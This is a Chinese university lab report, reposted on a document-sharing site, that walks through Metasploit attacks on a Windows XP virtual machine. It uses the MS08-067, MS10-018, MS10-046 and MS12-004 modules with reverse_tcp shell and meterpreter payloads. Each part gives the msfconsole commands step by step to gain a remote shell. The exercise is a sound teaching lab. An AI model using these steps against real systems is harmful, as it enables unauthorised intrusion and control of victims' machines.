计算机系统安全 实验二metasploit.docx
《计算机系统安全 实验二metasploit.docx》由会员分享,可在线阅读,更多相关《计算机系统安全 实验二metasploit.docx(21页珍藏版)》请在冰点文库上搜索。
![计算机系统安全 实验二metasploit.docx](https://file1.bingdoc.com/fileroot1/2023-5/6/5d5672ea-cd54-4ce8-b8c2-222e8cbe7fe5/5d5672ea-cd54-4ce8-b8c2-222e8cbe7fe51.gif)
计算机系统安全实验二metasploit
计算机系统安全实验二:
操作系统安全与metasploit渗透测试
实验目的:
学习计算机操作系统安全相关内容。
学习操作系统渗透相关内容
学习metasploit渗透工具使用。
实验原理:
Windows操作系统安全结构
网络渗透原理
实验环境:
软件:
vmware环境下,
虚拟机,vm-WinXP镜像
虚拟机,backtrack4及backtrack5虚拟机镜像等。
实验拓扑:
被渗透机:
使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP地址为,自动获得,虚拟机网络连接方式NAT方式。
实验室计算机network系统下中network_vm目录中有metasploitable_XP,可使用之。
渗透测试机:
使用Bt4或5作为操作系统,
准备工作:
启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:
被渗透机:
操作系统:
____windowsxpwithsp1_________
IP地址:
渗透测试机:
操作系统:
___________bt5_______
IP地址:
注意,若网络连接未启用,请先启用之,linux下可使用ifupeth0)
实验内容:
第一部分:
针对操作系统内部服务端口进行渗透
了解ms08-067漏洞详情:
(请课后上网查询相关内容)
漏洞描述:
曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。
MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
漏洞对象:
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有WindowsXP/2000/Vista/2003等。
除WindowsServer2008Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows2000、WindowsXP和WindowsServer2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。
这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
漏洞端口:
_______445_________________________________________________
步骤一:
启动metasploit控制台msfconsole
记录其
步骤二:
搜索模块ms08-067号模块
searchms08-067
找到模块,记录其名称,级别,描述
步骤三:
使用这个模块
usewindows/smb/ms08_067_netapi
步骤四:
查找有用的payloads
showpayloads
步骤五:
使用其中最常用的一个payload
setpayloadwindows/shell/reverse_tcp
步骤六:
查看当前的这个payload以及攻击所需要的参数选项
showoptions
发现模块所需要选项,有些有默认参数:
RPORT,SMBPIPE
有些没有RHOST
发现payload所需要参数,有些有默认参数:
EXITFUNC,LPORT
有些没有:
LHOST
渗透的目标设置值:
0
步骤七:
设置参数
setRHOST被渗透主机的IP地址
setLHOST 渗透测试主机的IP地址。
步骤八:
showoptions查看当前参数设置是否齐全。
步骤九:
showtargets查看当前攻击的目标。
0若有,则表示可进行自动选择攻击。
其他,则为特定选择特定系统。
步骤十:
参数齐全,目标选定,渗透载荷准备就绪,然后实施。
exploit
渗透开始。
。
。
。
。
自动创建一shell(命令提示符)
使用ipconfig及dir等命令确定当前控制的计算机是哪台。
打开放大镜:
步骤十一:
Exit然后再exit退出。
第二部分:
针对操作系统下的浏览器进行渗透
步骤一:
浏览器漏洞MS10-018
了解ms10-018漏洞详情:
(请课后上网查询相关内容)
漏洞描述:
在提交数据时InternetExplorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。
攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。
成功利用这个漏洞的攻击者可以查看本地计算机或其他域或InternetExplorer区中的其他浏览器窗口的内容。
漏洞对象:
Microsoft__Internet__ExplorerSP4
漏洞端口:
8080
步骤一:
启动metasploit控制台
msfconsole
步骤二:
搜索模块ms10-018号模块
searchms10-018
找到模块,记录其名称,级别,描述
步骤三:
使用这个模块
usewindows/browser/ms10_018_ie_behaviors
步骤四:
查找有用的payloads
showpayloads
步骤五:
使用其中最常用的一个payload
setpayloadwindows/shell/reverse_tcp
步骤六:
查看当前的这个payload以及攻击所需要的参数选项
showoptions
发现模块所需要选项,有些有默认参数:
SRVHOST,SRVPORT,SSL,SSLVersion
有些没有:
URIPATH
发现payload所需要参数,有些有默认参数:
EXITFUNC,LPORT
有些没有:
LHOST
步骤七:
设置SRVHOST和LHOST都设置为渗透测试机IP
setSRVHOSTLHOST
可设置为0
渗透准备
exploit
则列出一URL
如:
usingurl:
暂时渗透到此
(注意其中的qte30235fs为自动产生)
在当对方机器使用时,sessions产生
使用sessions来获知session
sessions-i1
直接将session转到shell中
创建一shell(命令提示符)
使用ipconfig及dir等命令确定当前控制的计算机是哪台
打开写字板:
第三部分:
针对操作系统下类似快捷方式使用进行渗透
步骤一:
浏览器漏洞MS10-046
了解ms10-046漏洞详情:
(请课后上网查询相关内容)
漏洞描述:
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。
这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。
默认下Windows启动了自动加载和自动播放功能,因此在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。
其他显示文件图标的应用也可用作这个漏洞的攻击载体。
漏洞对象:
MicrosoftWindowsXPSP3
MicrosoftWindowsXPSP2
MicrosoftWindows Vista SP2
MicrosoftWindows Vista SP1
MicrosoftWindowsServer2008
MicrosoftWindowsServer2008SP2
MicrosoftWindowsServer2008R2
MicrosoftWindowsServer2003SP2
MicrosoftWindows7
漏洞端口:
_________80_______________________________________________
步骤一:
启动metasploit控制台msfconsole
步骤二:
搜索模块ms10-046号模块
searchms10-046
找到模块,记录其名称,级别,描述
步骤三:
使用这个模块
usewindows/browser/ms10_046_shortcut_icon_dllloader
步骤四:
查找有用的payloads
showpayloads
步骤五:
使用其中最常用的一个payload
setpayloadwindows/shell/reverse_tcp
步骤六:
查看当前的这个payload以及攻击所需要的参数选项
showoptions
发现模块所需要选项,有些有默认参数:
SRVPORT,SRVHOST,URIPATH
有些没有UNCHOST
发现payload所需要参数,有些有默认参数:
EXITFUNC,LPORT
有些没有:
LHOST
步骤七:
设置SRVHOST和LHOST都设置为渗透测试机IP
setSRVHOSTLHOST
设置浏览的URL
setURIPATH(其中hzs为你的姓名的首字母)
target可设置为0
渗透准备
exploit
报错,说明URIPATH不能改动,需要改回默认值
重新exploit
则列出一URL
如:
usingurl:
暂时渗透到此
在当对方机器使用如:
usingurl:
时,sessions产生
使用sessions来获知session
sessions-i1
直接将session转到shell中
创建一shell(命令提示符)
使用ipconfig及dir等命令确定当前控制的计算机是哪台
打开任务管理器:
使用taskmgr命令
*第四部分:
渗透时使用meterpreter工具。
浏览器漏洞MS12-004
WindowsMediaPlayer是系统的多媒体播放组件。
WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。
受影响系统:
MicrosoftWindowsXPProfessional
MicrosoftWindowsXPHomeEdition
MicrosoftWindowsVista
MicrosoftWindowsStorageServer2003
MicrosoftWindowsServer2008
MicrosoftWindowsServer2003WebEdition
MicrosoftWindowsServer2003StandardEdition
MicrosoftWindowsServer2003EnterpriseEdition
MicrosoftWindowsServer2003DatacenterEdition
MicrosoftWindows7
启动msfconsole
searchms12_004
搜索不到该模块
得到相关结果为windows/browser/ms12_004_midi
使用它
usewindows/browser/ms12_004_midi
查看payloads
showpayloads
setpayloadwindows/meterpreter/reverse_tcp
查看相关的选项options
showoptions
有SRVHOSTSRVPORTSSL及SSLversion为模块的参数
有EXITFUNC和LHOST及LPORT作为payload的参数。
还有target设置
设置SRVHOST和LHOST都设置为本地IP
setSRVHOSTLHOST可设置为0
setURLPATH
渗透准备
exploit
则列出一URL
如:
using暂时渗透到此
在当对方机器使用时,sessions产生
使用sessions来获知session
sessions-i1
直接将session转到shell中
创建至meterpreter
使用命令查看当前的meterpreter可操作的内容。
试使用相关的进程管理工具对被渗透计算机上的进行管理!
实验心得:
通过实验学习到了如何利用metasploit入侵其他电脑,可以在知道对方ip地址的情况下主动渗透,也可以诱使用户访问恶意网页控制用户系统,由此可见漏洞被不法之徒利用之后会对用户造成巨大的损失,让我意识到学好计算机系统安全这门课的重要性。